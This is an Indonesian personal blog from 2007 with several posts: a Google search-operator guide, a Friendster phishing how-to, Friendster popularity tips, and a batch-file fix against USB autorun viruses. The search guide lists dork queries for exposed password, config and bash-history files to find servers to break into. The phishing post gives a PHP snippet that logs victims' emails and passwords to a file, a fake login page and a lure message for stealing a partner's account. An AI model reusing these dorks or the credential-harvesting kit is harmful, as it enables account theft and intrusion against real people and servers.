Jumat, 28 Desember 2007

Trik Menggunakan Google

Kemungkinan ini akan bermanfaat dalam pemcarian di google

“” Intitle:” ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan judul yang mengandung informasi pada topik yang
dimaksud. Sebagai contoh pada pencarian, “intitle:
password admin ” ( tanpa tanda kutip ). Pencarian akan mencari page yang mengandung kata ” password ” sebagai judulnya dengan prioritas utama “admin” .
Jika pada pencarian terdapat dua query pencarian utama, digunakan sintaks allintitle: untuk pencarian secara lengkap. Sebagai contoh pada pencarian “allintitle:admin mdb”. Maka pencarian akan dibatasi pada dua subjek utama judul yaitu “admin” dan “mdb”.
” inurl:” ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan semua URL yang hanya berisi kata kunci informasi yang dimaksudkan. Sebagai contoh pencarian dalam pencarian,”inurl : database mdb”. Pencarian akan menghasilkan semua URL yang hanya mengandung informasi tentang “database mdb “.

Hal yang sama juga berlaku pada sintaks ini, jika terdapat dua query pencarian utama, digunakan sintaks “allinurl:” untuk mendapatkan list url tersebut.
Sebagai contoh pencarian “allinurl: etc/passwd” , pencarian akan menghasilkan URL yang mengandung informasi tentang “etc” dan “passwd”. Tanda garis miring slash (”/”) diantara dua kata etc dan passwd akan diabaikan oleh mesin pencari Google.
“site:” ialah sintaks perintah untuk membatasi pencarian suatu query informasi berdasarkan pada suatu situs atau domain tertentu. Sebagai contoh pada pencarian informasi: “waveguide site:itb.ac.id” (tanpa tanda kutip). Pencarian akan mencari topic tentang waveguide pada semua halaman yang tersedia pada domain itb.ac.id.
Baca Lanjutannya…!!!!!!
“cache:” akan menunjukkan daftar web yang telah masuk kedalam indeks database Google. Sebagai contoh:
“cache:deffcon.org”, pencarian akan memperlihatkan list yang disimpan pada Google untuk page deffcon.org

“filetype:” ialah sintaks perintah pada Google untuk pencarian data pada internet dengan ekstensi tertentu (i.e. doc, pdf or ppt etc). Sebagai contoh pada pencarian : “filetype:doc site:go.id confidental” ( tanpa tanda kutip). Pencarian akan menghasilkan file data dengan ekstensi “.doc” pada semua domain go.id yang berisi informasi “confidential”.
“link:” ialah sintaks perintah pada Google yang akan menunjukkan daftar list webpages yang memiliki link pada webpage special. Sebagai contoh:”link:www.securityfocus.com” akan menunjuukan daftar webpage yang memiliki point link pada page SecurityFocus.
“related:” sintaks ini akan memberikan daftar web pages yang serupa dengan web page yang di indikasikan.

Sebagai contoh: “related:www.securityfocus.com”, pencarian akan memberi daftar web page yang serupa dengan homepage Securityfocus.
“intext:” sintaks perintah ini akan mencari kata kata pada website tertentu. Perintah ini mengabaikan link atau URL dan judul halaman. Sebagai contoh :
“intext:admin” (tanpa tanda petik), pencarian akan menghasilkan link pada web page yang memiliki keyword yang memiliki keyword admin.
Beberapa query sintaks diatas akan sangat membantu dalam pencarian data dan informasi lebih detail.

Google dapat menjadi mesin pencari untuk menggali informasi tertentu dan rahasia, informasi yang tidak diperkirakan yang dapat memberitahukan sisi lemah suatu sistem. Hal tersebut yang dimanfaatkan oleh sebagian individu untuk melakukan penetrasi suatu server atau sistem informasi .
Sintaks “Index of ” dapat digunakan untuk mendapatkan situs yang menampilkan indeks browsing direktori.

Webserver dengan indeks browsing yang dapat diakses, berarti siapa saja dapat melakukan akses pada direktori webserver, seperti layaknya dapat dilakukan pada lokal direktori pada umumnya.

Pada kesempatan ini dipaparkan bagaimana penggunaan sintaks “index of” untuk mendapatkan hubungan pada webserver dengan direktori indeks browsing yang dapat diakses.. Hal tersebut merupakan sumber informasi yang sederhana dapat diperoleh, akan tetapi isi dari informasi seringkali merupakan informasi yang sangat penting. Informasi tersebut dapat saja berupa password akses atau data transaksi online dan hal yang sangat penting lainnya.
Dibawah ini merupakan beberapa contoh penggunaan sintaks ” indeks of” untuk mendapatkan informasi yang penting dan sensitive sifatnya.

ex :
Index of /admin
Index of /passwd
Index of /password
Index of /mail
“Index of /” +passwd
“Index of /” +password.txt
“Index of /” +.htaccess
“Index of /secret”
“Index of /confidential”
“Index of /root”
“Index of /cgi-bin”
“Index of /credit-card”
“Index of /logs”
“Index of /config”
“Index of/admin.asp
“Index of/login.asp

Mencari sistem atau server yang vulnerable menggunakan sintaks “inurl:” atau “allinurl:”
1. Menggunakan sintaks “allinurl:winnt/system32/” (dengan tanda petik ) akan menampilkan daftar semua link pada server yang memberikan akses pada direktori yang terlarang seperti “system32″. Terkadang akan didapat akses pada cmd.exe pada direktori “system32″ yang memungkinkan seseorang untuk mengambil alih kendali sistem pada server tersebut.

2. Menggunakan “allinurl:wwwboard/passwd.txt” ( dengan tanda petik ) akan menampilkan daftar semua link pada server yang memiliki kelemahan pada “wwwboard Password”. Pembahasan lebih lanjut tentang vulnerability “wwwboard Password” dapat dilihat pada site keamanan jaringan seperti http://www.securityfocus.com atau http://www.securitytracker.com

3. Menggunakan sintaks “inurl: bash history” (dengan tanda petik ) akan menampilkan daftar link pada server yang memberikan akses pada file “bash history” melalui web. File tersebut merupakan command history file yang mengandung daftar perintah yang dieksekusi oleh administrator, yang terkadang menyangkut informasi sensitive seperti password sistem. Seringkali password pada sistem telah dienkripsi, untuk mendapatkan password aslinya bentuk yang dienkripsi ini harus didekripsi menggunakan program password cracker. Lama waktu untuk mendapatkan hasil dekripsi tergantung dari keandalan program dan banyaknya karakter yang terenkripsi.

4. Menggunakan “inurl:config.txt” (dengan tanda petik) akan menampilkan daftar semua link pada server yang memberikan akses pada file “config.txt. File ini berisi informasi penting termasuk hash value dari password administrator dan proses autentifikasi dari suatu database.
Sintaks “inurl:” atau “allinurl:” dapat dikombinasikan dengan sintaks yang lainnya seperti pada daftar dibawah ini :

Inurl: /cgi-bin/cart32.exe
inurl:admin filetype:txt
inurl:admin filetype:db
inurl:admin filetype:cfg
inurl:mysql filetype:cfg
inurlasswd filetype:txt
inurl:iisadmin
inurl:auth_user_file.txt
inurlrders.txt
inurl:”wwwroot/*.”
inurl:adpassword.txt
inurl:webeditor.php
inurl:file_upload.php
inurl:gov filetype:xls “restricted”
index of ftp +.mdb allinurl:/cgi-bin/ +mailto allinurl:/scripts/cart32.exe allinurl:/CuteNews/show_archives.php
allinurl:/phpinfo.php
allinurl:/privmsg.php
allinurl:/privmsg.php
inurl:cgi-bin/go.cgi?go=*
allinurl:.cgi?page=*.txt
allinurul:/modules/My_eGallery
Mencari suatu sistem atau server yang memiliki kelemahan dengan sintaks “intitle:”
atau “allintitle:””

Penerapan Engineering Untuk Mendapatkan Password Di Friendster

Setelah mencari ide apa yang artikel apa yang harus dimasukan kedalam blog saya. akhirnya saya memutuskan untuk mencari artikel tentang cara menghacking password Friendster karena banyak teman - teman saya yang menyarankan untuk memasukan artikel tersebut agar mereka mudah untuk membacanya tanpa perlu memakai search engine segala. dan setelah goggling sejenak akhirnya saya dapat juga di dalam memori ilmu hack saya.

nah ini dia selamat membaca. [Andy];)

Artikel ini ditujukan bahwa ” Hacking tidak selamanya menggunakan TOOLS “. So bagi para 3133t sebaiknya tidak membaca ARTIKEL ini jika anda tidak ingin mual, perut kembung, bibir pecah2, kepala senut2.. :Pdll.

Artikel ini diperuntunkan bagi anda tertarik, cinta, haus ilmu dari Social Engineering….

Sekali lagi Artikel ini hanya ditujukan bagi temen2 yg belum mengetahui teknik ini. Jika temen2(terutama for 3133t) Sudah tahu teknik ini SAYA MOHON STOP!! STOP!! STOP!! STOP!! STOP!! STOP!! tetapi bila anda tetap sja Ngotot ingin meneruskan saya tidak bisa memaksa anda…

Lanjutt ….

Akhir-akhir ini banyak yg membicarakannya, bahkan sedang menjadi berita hangat. Mngkin para 3133t sudah menemukannya hampir 2 tahun yg lalu. Sebagaimna telah dijelaskan pada artikel sebelumnya (WuPz, jagonya dll). Testimonial Redirect bisa jadi berabe bgt kalo disalah gunakan. Artinya?? cara tersebut bisa digunain buat ngedapetin password, cookies, or perhatian lebih dari doi ama kita ;)) n laen-laen .. :P.

So langsung saja kita menuju acara puncak …

Pertama-tama yg mesti kita siapin :

1. Teh manis penghangat malam.
2. Jangan Lupa cemilan yg bikin Kriuk .. kriuk …
3. Web Hosting yg support PHP. Cari di paman Google banyak..
4. Upload file index.htm (ada di source).

5. Sertakan code php dan JavaScript di bawah ini dan ” SAVE As ” sesuai dg nama link yg dituju pada Form Login.

$email = $_POST[email];
$password = $_POST[password];
$fl = fopen(’password.txt’, ‘a’);
fwrite($fl, “$email . $password \n\n”);
fclose($fl);

?>

Dan upload file diatas ke www.webyangsupportphp.com

6. Buat file Text kosong dengan nama Sesuai perintah Open pada php code di atas. Jangan lupa CHMOD diganti sesuai dg kebutuhan kamu!!.

7. kirim testi dg :

hai syang .. gimna kabarna, kagen nie ..

nah .. Setelah sang pacar penerima testi membuka “New Testimonials”, maka sesuai dg perintah yang berada di JavaScript => window.location <= yg disisipkan maka link akan menuju ke http://webyangsupportphp.com/index.htm . setelah terbuka, secara tanpa sadar sang pacar mengira halaman yg terbuka adalah sungguhan. Ya !!!! tanpa disuruh, dibelai-belai, n tanpa rayuan maut pun sang pacar akan dg rela hati mengisi Form login tipuan.
Akhirnya dg pura-pura tidak tahu, muka bego, sedikit bodoh. Si pengirim testi menawarkan jasanya untuk sang pacar tercinta… :P=] :))

Selain itu teknik diatas akan terlihat seperti aslinya jika menggunakan ” OVERLAY GENERATOR ” pada profil fs pada saat pengiriman testimonial yg berisi html code ( index.htm). Dg mengganti link Relatif menjadi absolut(baca S.I.H lebih lanjut) pada form login di index.htm maka pada saat pengiriman data akan menuju ke http://webyangsupportphp.com/login.php

Kesimpulan :

# Hacking tidak selamanya menggunakan ” TOOLS “
# Kelemahan XSS merupakan bahaya besar
# Teknik ini semata-mata hanya untuk pengetahuan. Resiko ditanggung anda sendiri !!!!

Kamis, 27 Desember 2007

Trik Menjadi Terkenal Di Friendster

Andy: ^_^


Ini buat para Friendstergenic dan para Friendsterholic yang tergila-gila dengan friendster. Berikut tips petunjuk singkat yang bisa kamu praktekkan untuk menjadi popular dan terkenal di friendster layaknya selebritis.

[1] Pastikan tampilan profil friendster kamu sangat unik dan menarik. Kamu bisa merancang sendiri tampilannya dengan mengotak-atik kode CSS nya atau kamu bisa gunakan yang sudah jadi dan siap pakai. Kamu bisa liat di Friendster-Layout.com ato buka-buka lagi halaman blog ini.

[2] Langkah selanjutnya adalah tentang isi profile kamu sendiri. Pastikan kamu menuliskan dengan jelsa, singkat dan dengan kata-kata yang enak didengar serta kata-kata yang gak terlalu formal. Pilih kata yang lebih familiar, juga jangan terlalu banyak menggunakan bahasa gaul. Deskripsikan tentang dirimu dengan jelas agar si pembaca bisa cepat merasa nyaman dan familiar dengan yang punya profile. Ingat jangan terlalu jaim dan sombong.

[3] Pastikan profile kamu terlihat ringkas, padat tapi simple. Kamu bisa menambahkan beberapa video dari youtube, ato menambahkan slidehow di bagian Now Playing section dengan embed.

[4] Bagaimana dengan teman alias Friends? haha..oke ini adalah bagian pentingnya dari bisnis perFriendster-an ini. namanya juga Friendster, jadi intinya kan semua tentang pertemanan (friendster=Pertemanan). Saat seseorang menambahkan teman baru (invite / add friends) itu berarti seseorang tersebut tertarik. So kalo ada seseorang yang meng-add FSmu sebagai teman (friends)nya berarti orang tersebut memiliki rasa ketertarikan untuk tahu lebih banyak lagi tentang kamu. So jangan lupa setelah melakukan Approve kamu kirimi dia testi/comment mengatakan terimakasih telah di add ato thanks for adding me ato apa kek terserah bagaimana kamu merangkai katanya. Kalo bisa jangan lupa mengucapkan "keep in touch with me" biar mereka (friends) merasa kamu perhatikan.

[5] Nah saat orang tersebut membalas testimu kembali, berarti itu adalah sebuah awal yang bagus untuk menjalin pertemanan dengannya.

[6] Yang terpenting jangan sampai kamu acuhkan setiap ada orang yang memberimu testimonial alias comment, langsung balas saat kamu sempat.

[7] Sebagai penutup jangan bersikap terlalu naif dengan menjadi terlalu sombong atau bahkan terlihat terlalu sengsara (pathetic). Usahakan tetap nice dan cool alias keren. Nah kalo itu semua belum membuat kamu sukses..

Hubungin Aq Di Andy_Dn_Angel@Yahoo.Co.Id

Membuat Flashdisk Aman Dari Autorun-Nya Si-Virus

Andy: ^_^

Tentunya teman2 semuanya sudah mengetahui bhw virus2 dapat menularkan dirinya ke komputer2 lain dengan media flashdisk. -.-“. Kesal? Sudah pasti! Saya juga merasakan perasaan yang sama ketika komputer saya juga ikut2an kena virus… tapi saya punya cara yang ampuh agar virus yang ada di flashdisk tersebut tidak dapat menularkan dirinya ke komputer lain..

Baiklah saya akan mulai membahasnya sekarang, diawali dengan cara penularan virus lewat media flashdisk. Sebenarnya sangat simple, ketika flashdisk dicolokan kedalam port usb virus yang sedang berjalan tinggal men-copy dirinya sendiri ke dalam flashdisk, dan tidak lupa pula dengan membuat file “autorun.inf” yang letak file-nya kasat mata sehingga tidak dapat dilihat. nah… file inilah yang akan kita edit agar virusnya tidak dapat menjalankan dirinya di komputer kita.

Cara yang pertama dengan mengedit secara manual dengan menggunakan notepad atau wordpad. Diasumsikan flashdisk kita yang telah dicolokan kedalam komputer (yang telah terinfeksi) beralamat “F:\”, maka saya akan mencoba membuka file “F:\autorun.inf” lalu enter. Lalu notepad akan terbuka secara otomatis dengan beberapa mantra didalamnya, setelah itu kita tinggal mengedit mantra tersebut dengan memblock semua mantra tersebut(ctrl+a) lalu hapus(backspace atau del) lalu anda bisa membiarkannya kosong lalu tekan ctrl+s untuk men-savenya. Anda juga bisa menuliskan beberapa puisi indah tentang perdamaian didalamnya ^-^.

Tetapi bang blckflcn, bagaimana jika file tersebut memiliki attribute “read-only”? yang jelas kita tidak dapat mengeditnya secara manual!(aaaaarrrrrgh!!!!). Lalu? Apa yang dapat kita lakukan… bang blckflcn? Gigi dibalas dengan gigi, mata dibalas dengan mata, dan yah… anda benar! MANTRA juga DIBALAS DENGAN MANTRA!! Mantranya sangatlah mudah… saya akan membahasnya secara bertahap sekarang juga :

1)buka aplikasi notepad (tempat dimana kita akan menulis mantra)

2)tuliskan mantra “del /a:r f:\autorun.inf” (tnp tanda petik) lalu enter.

3)langkah selajutnya adalah tulis mantra lagi! Mantranya “echo ‘terserah tulisan apa’ >f:\autorun.inf&attrib +r f:\autorun.inf” (tnp tanda petik juga).

4)lalu save file mantra tersebut dengan nama file terserah anda dan path-nya terserah anda juga, tetapi extension-nya harus “.bat”(harus tidak boleh tidak)

5)lalu jalankan file mantra yang baru kita buat tersebut

6)buka explorer

7)pada bagian address tuliskan “F:\autorun.inf”, lalu tekan enter sambil mengucapkan “sim…salabim…”. Maka aplikasi notepad akan muncul lagi sambil menampilkan beberapa tulisan, tetapi yang ini jelas bukan mantra ^-^.

Setelah beberapa step tadi, virus tidak dapat menjalankan dirinya di komputer lain ketika kita mencolokan flashdisk kita kedalam port usb-nya. Tetapi bang blckflcn, virus2 dari komputer yang terinfeksi tersebut masih ada di dalam flashdisk saya. Bagaimana ini? Yah, itu sih bukan tugas saya lagi. Itu sih sudah menjadi tugas anti-virus… saya hanya memberitahukan cara agar virusnya tidak berjalan ketika flashdisk kita dicolokan kedalam port usb pada komputer yang lain… lagian mantra yang saya punya masih belum begitu ampuh untuk membuat virus tidak berjalan di komputer. Oleh karena itu, saya akan belajar tentang mantra2 tersebut di hogwarts agar lebih ampuh. Hehehe… ^-^.